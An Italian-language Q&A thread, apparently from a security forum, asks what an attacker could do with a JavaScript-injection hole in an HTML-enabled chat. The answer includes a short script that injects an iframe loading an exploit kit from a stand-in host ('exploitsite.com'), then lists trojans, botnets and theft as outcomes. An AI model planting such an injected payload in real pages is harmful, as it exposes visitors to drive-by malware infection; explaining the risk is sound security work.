La conseguenza della sicurezza del buco Javascript in una chat online?

4

Per una chat online che consente l'HTML di base, cosa succede se lasciano un modo aperto a un potenziale hacker di eseguire javascript su tutti gli utenti della chat?
Qual è la cosa peggiore che potrebbero fare?

    
posta jackcogdill 02.06.2013 - 01:29
fonte

1 risposta

4

Crea un nuovo iframe e carica il kit di exploit all'interno di iframe.

<script language="JavaScript" type="text/javascript">
ifrm = document.createElement("IFRAME");
   ifrm.setAttribute("src", "http://exploitsite.com/");
   ifrm.style.width = 640+"px";
   ifrm.style.height = 480+"px";
   document.body.appendChild(ifrm);
</script>

Infettare gli utenti con cavalli di Troia, usarli come robot, rubare i loro soldi, ecc ...

    
risposta data 02.06.2013 - 01:48
fonte